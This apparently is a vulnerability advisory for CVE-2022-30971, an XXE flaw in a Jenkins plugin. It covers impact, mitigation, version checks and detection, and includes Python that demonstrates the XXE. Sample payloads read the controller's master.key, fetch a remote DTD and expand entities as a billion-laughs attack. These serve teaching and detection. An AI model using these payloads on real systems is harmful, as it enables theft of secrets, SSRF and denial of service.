CVE-2022-30971

8.8 HIGH

📋 TL;DR

CVE-2022-30971 is an XML external entity (XXE) vulnerability in the Jenkins Storable Configs Plugin: the plugin does not configure its XML parser to prevent XXE, so an attacker who can get the plugin to parse a crafted XML document can read files from the Jenkins controller (including stored secrets) or use the controller for server-side request forgery (SSRF). It affects any Jenkins instance with the plugin installed; the attacker needs whatever access the plugin requires to submit XML, typically an authenticated account able to configure jobs or use the plugin's features.
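The mechanics behind this class of bug, as an added example that is not the plugin's own code: a job-configuration-shaped document declares an external entity pointing at a local file, a parser left with external entity resolution enabled expands it into element text, and a hardened parser refuses the DOCTYPE outright. The secret file, the document shape and the parser configuration are constructed for illustration (Python's xml.sax on a POSIX path); the real plugin parses XML in Java, and its exact input path is not described on this page.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file on the controller (not a real secret).
SECRET_CONTENT = "admin-api-token=EXAMPLE-TOKEN-NOT-REAL\n"


def write_secret_file():
    """Create the temporary file the XXE payload will try to read."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET_CONTENT)
    return path


def xxe_job_config(target_path):
    """A config.xml-shaped document carrying an external entity.

    The shape is generic XXE (assumption), not the plugin's actual upload format."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE project [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<project>\n"
        "  <description>&xxe;</description>\n"
        "</project>\n"
    )


class DescriptionHandler(ContentHandler):
    """Collects the text of <description>, where the entity gets expanded."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "description":
            self.inside = True

    def endElement(self, name):
        if name == "description":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.chunks.append(content)

    @property
    def text(self):
        return "".join(self.chunks)


def _run_parser(xml_text, resolve_external):
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = DescriptionHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.text


def parse_unsafely(xml_text):
    """XXE-prone configuration: external general entities are fetched and inlined."""
    return _run_parser(xml_text, resolve_external=True)


def parse_safely(xml_text):
    """Hardened: refuse any DOCTYPE up front and keep external entity resolution off."""
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):
        raise ValueError("DOCTYPE declarations are not accepted in job configuration")
    return _run_parser(xml_text, resolve_external=False)


def demo():
    """Returns (text leaked by the unsafe parser, outcome of the safe parser)."""
    path = write_secret_file()
    try:
        doc = xxe_job_config(path)
        leaked = parse_unsafely(doc)
        try:
            parse_safely(doc)
            safe_outcome = "accepted"
        except ValueError as exc:
            safe_outcome = f"rejected: {exc}"
    finally:
        os.unlink(path)
    return leaked, safe_outcome


if __name__ == "__main__":
    leaked, outcome = demo()
    print("unsafe parser leaked:", leaked.strip())
    print("safe parser:", outcome)
```

Rejecting the DOCTYPE is preferable to merely disabling external entities: it also blocks parameter-entity tricks and entity-expansion denial of service, and a document that legitimately describes a Jenkins job never needs one.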

💻 Affected Systems

Products:
  • Jenkins Storable Configs Plugin
Versions: 1.0 and earlier
Operating Systems: All operating systems where Jenkins runs (e.g., Linux, Windows, macOS)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability is present in default configurations of the plugin; no special setup is required for exploitation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker who can get the plugin to parse a crafted XML document reads files from the Jenkins controller (for example files under JENKINS_HOME holding credentials or job configuration), uses the controller as a pivot for SSRF against internal services, or triggers denial of service through entity expansion. Leaked controller secrets can then be used to extend the compromise to systems Jenkins deploys to or authenticates against.

🟠 Likely Case

In most scenarios an authenticated Jenkins user with enough access to reach the plugin's features exfiltrates files from the controller or probes the internal network from it, leading to a data breach or lateral movement.

🟢 If Mitigated

With the plugin removed or its use restricted to trusted administrators, and with the controller segmented and its outbound traffic filtered, impact is limited to isolated data exposure without escalation to critical systems.

🌐 Internet-Facing: HIGH, as internet-facing Jenkins instances are directly accessible, increasing the attack surface for exploitation by external actors.
🏢 Internal Only: MEDIUM, as internal attackers with network access could still exploit it, but requires some level of authentication or insider threat.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account with enough access to feed XML to the plugin (for example, the ability to configure jobs or use the plugin's features); beyond that, XXE payloads are generic and well documented and need no plugin-specific tooling, so an attacker with that access has a straightforward path.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check the vendor advisory for a fixed release before relying on an update. If the advisory entry for this plugin states that no fix is available, there is no safe version to upgrade to and the plugin should be removed instead.

Vendor Advisory: https://www.jenkins.io/security/advisory/2022-05-17/#SECURITY-1969

Restart Required: Yes

Instructions:

1. In Manage Jenkins > Plugin Manager, check whether an update for Storable Configs Plugin is offered and whether it matches the release the vendor advisory names as fixed.
2. If a fixed release exists, install it and restart the Jenkins service to apply the change; if not, uninstall the plugin (see Temporary Workarounds) rather than leaving version 1.0 installed.
3. Confirm the installed version (or the plugin's absence) in the Plugin Manager afterwards.

🔧 Temporary Workarounds

Disable or Remove the Plugin (all platforms)

Disabling or uninstalling the plugin removes the vulnerable XML parser entirely; do this wherever its job configuration export/import features are not essential.

Navigate to Jenkins > Manage Jenkins > Plugin Manager, find 'Storable Configs Plugin', and click 'Disable' or 'Uninstall'.

Restrict Access to Jenkins (linux)

Limit network access to Jenkins to trusted IPs and enforce strong authentication so that only known users can reach the plugin at all.

Configure firewall rules and enable authentication in Jenkins settings. An ACCEPT rule on its own changes nothing; everything else reaching the port has to be dropped after it, for example with iptables on Linux:

sudo iptables -A INPUT -p tcp --dport 8080 -s TRUSTED_IP -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8080 -j DROP

This reduces exposure but does not stop an authenticated user who already has the access the plugin requires; only removing the plugin does that.

🧯 If You Can't Patch

  • Remove or disable the plugin if its functionality is not needed; that takes the vulnerable parser out of the deployment entirely.
  • Segment the controller from sensitive systems and filter its outbound traffic: SSRF through XXE reaches only what the controller itself can reach.
  • Restrict which accounts can configure jobs or use the plugin, and review audit logs and job configuration changes so that exploitation attempts are noticed quickly.

🔍 How to Verify

Check if Vulnerable:

Check the installed version of the Storable Configs Plugin in Jenkins: Go to Manage Jenkins > Plugin Manager, search for 'Storable Configs', and verify if version is 1.0 or earlier.

Check Version:

On the Jenkins server, you can check via the CLI (requires Jenkins CLI setup and a user API token): 'java -jar jenkins-cli.jar -s http://localhost:8080/ -auth USER:API_TOKEN list-plugins | grep -i storable'. Each output line gives the plugin's short name, display name and installed version.

Verify Fix Applied:

After updating or removing the plugin, confirm in the Plugin Manager that version 1.0 or earlier is no longer installed (or that the installed version is the one the vendor advisory names as fixed), and test any job export/import workflows that depended on the plugin to ensure no regression.
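A fleet-wide version check, as an added example that is not part of this page or of Jenkins: it reads the Plugin Manager's JSON API (/pluginManager/api/json?depth=1) and flags any installed plugin whose short name starts with the assumed prefix storable-configs at version 1.0 or earlier. The sample response is constructed; fetch_plugins needs network access and a user API token and is not exercised offline.

```python
import base64
import json
import re
import urllib.request

# Assumed short-name prefix for the plugin listed as "Storable Configs Plugin".
PLUGIN_PREFIX = "storable-configs"
LAST_KNOWN_VULNERABLE = (1, 0)  # "1.0 and earlier" is affected


def version_tuple(version):
    """Turn '1.0', '1.0.1' or '1.0-beta' into a comparable tuple of integers."""
    return tuple(int(n) for n in re.findall(r"\d+", version)) or (0,)


def assess_plugins(api_json):
    """Inspect the JSON returned by /pluginManager/api/json?depth=1.

    Returns a list of (shortName, version, verdict) for matching plugins;
    an empty list means the plugin is not installed on that controller."""
    results = []
    for plugin in api_json.get("plugins", []):
        short = plugin.get("shortName", "")
        if not short.startswith(PLUGIN_PREFIX):
            continue
        version = plugin.get("version", "")
        if not plugin.get("enabled", True):
            verdict = "installed-but-disabled"
        elif version_tuple(version) <= LAST_KNOWN_VULNERABLE:
            verdict = "vulnerable"
        else:
            verdict = "newer-than-1.0: confirm against the vendor advisory"
        results.append((short, version, verdict))
    return results


def fetch_plugins(base_url, user, api_token):
    """Query a live controller with HTTP basic auth (user name + API token)."""
    url = (base_url.rstrip("/")
           + "/pluginManager/api/json?depth=1&tree=plugins[shortName,version,enabled,active]")
    req = urllib.request.Request(url)
    cred = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    req.add_header("Authorization", "Basic " + cred)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


# Constructed sample response (not captured from a real controller).
SAMPLE_RESPONSE = json.loads("""{"plugins": [
  {"shortName": "git", "version": "4.11.3", "enabled": true, "active": true},
  {"shortName": "storable-configs-plugin", "version": "1.0", "enabled": true, "active": true}
]}""")


if __name__ == "__main__":
    for short, ver, verdict in assess_plugins(SAMPLE_RESPONSE):
        print(f"{short} {ver}: {verdict}")
```

Run assess_plugins(fetch_plugins(url, user, token)) against each controller in the estate; a disabled plugin is reported separately because it still sits on disk and can be re-enabled.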

📡 Detection & Monitoring

Log Indicators:

  • Jenkins does not log XXE by name. Look in jenkins.log for XML parse failures (SAXParseException stack traces, and "DOCTYPE is disallowed" errors once a hardened parser is in place) that mention the plugin's classes, and inspect anything the plugin or users have stored under JENKINS_HOME (job config.xml files, uploaded configurations) for DOCTYPE or ENTITY declarations, which do not appear in XML that Jenkins writes itself.

Network Indicators:

  • Monitor for unexpected outbound connections from Jenkins to internal systems or external domains, which may indicate SSRF activity.

SIEM Query:

Example query for Splunk: 'index=jenkins_logs sourcetype=jenkins ("<!DOCTYPE" OR "<!ENTITY" OR "SAXParseException" OR "file://" OR "external entity") | stats count by host'. The literal strings "XXE" or "external entity" only match if some component logs them by name, so the DOCTYPE/ENTITY and parse-error terms carry most of the detection value.
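Detection logic over the data a controller actually holds, as an added example rather than anything shipped with Jenkins: a scanner that flags DOCTYPE and entity declarations in XML that the plugin or its users may have submitted (stored job config.xml files, captured upload bodies), classifies entity targets as local file reads or outbound SSRF/out-of-band fetches, and counts internal entities as a crude billion-laughs check. The sample documents are constructed, and the JENKINS_HOME layout it globs and the expansion threshold are assumptions.

```python
import re
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import urlsplit

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri">, and the PUBLIC forms.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)
# <!ENTITY name "literal"> (internal entities, the building block of expansion DoS).
INTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*[^\s>]+\s+[\"']", re.IGNORECASE)

LOCAL_SCHEMES = {"file", ""}  # "" covers bare absolute paths
EGRESS_SCHEMES = {"http", "https", "ftp", "gopher", "jar", "netdoc"}  # jar:/netdoc: are JVM-specific
ENTITY_EXPANSION_THRESHOLD = 5  # assumed; Jenkins-written XML declares no entities at all


@dataclass
class Finding:
    source: str
    kind: str    # local-file-read | ssrf-or-oob | unknown-scheme | entity-expansion | doctype-only
    detail: str


def classify_uri(uri):
    scheme = urlsplit(uri).scheme.lower()
    if scheme in LOCAL_SCHEMES:
        return "local-file-read"
    if scheme in EGRESS_SCHEMES:
        return "ssrf-or-oob"
    return "unknown-scheme"


def scan_document(source, text):
    """Return the findings for one XML document; an empty list means nothing suspicious."""
    findings = []
    if not DOCTYPE_RE.search(text):
        return findings  # no DOCTYPE, so no entity declarations of any kind
    for m in EXTERNAL_ENTITY_RE.finditer(text):
        label = "parameter entity" if m.group("param") else "entity"
        findings.append(Finding(source, classify_uri(m.group("uri")),
                                f"{label} {m.group('name')} -> {m.group('uri')}"))
    internal = len(INTERNAL_ENTITY_RE.findall(text))
    if internal >= ENTITY_EXPANSION_THRESHOLD:
        findings.append(Finding(source, "entity-expansion",
                                f"{internal} internal entities (possible billion-laughs DoS)"))
    if not findings:
        findings.append(Finding(source, "doctype-only",
                                "DOCTYPE present without external entities; review manually"))
    return findings


def scan_jenkins_home(root):
    """Scan job configurations under an assumed JENKINS_HOME layout (jobs/*/config.xml)."""
    results = []
    for path in Path(root).glob("jobs/*/config.xml"):
        results.extend(scan_document(str(path), path.read_text(errors="replace")))
    return results


# Constructed samples: one legitimate config and three hostile uploads.
SAMPLES = {
    "jobs/build-app/config.xml":
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<project><description>nightly build</description></project>',
    "upload-1.xml":
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE project [<!ENTITY xxe SYSTEM "file:///var/lib/jenkins/secrets/master.key">]>\n'
        '<project><description>&xxe;</description></project>',
    "upload-2.xml":
        '<!DOCTYPE project [\n  <!ENTITY % dtd SYSTEM "http://10.0.0.5:8080/evil.dtd">\n  %dtd;\n]>\n'
        '<project/>',
    "upload-3.xml":
        '<!DOCTYPE p [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;">'
        '<!ENTITY d "&c;&c;&c;&c;"><!ENTITY e "&d;&d;&d;&d;">]><p>&e;</p>',
}


def scan_samples():
    return {name: scan_document(name, text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        for f in findings:
            print(f"{f.source}: {f.kind}: {f.detail}")
```

A parameter entity fetched over HTTP (upload-2) is the out-of-band pattern used when the parser's output is not returned to the attacker; alert on that scheme class even when the target looks internal, since the request leaves the controller regardless.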
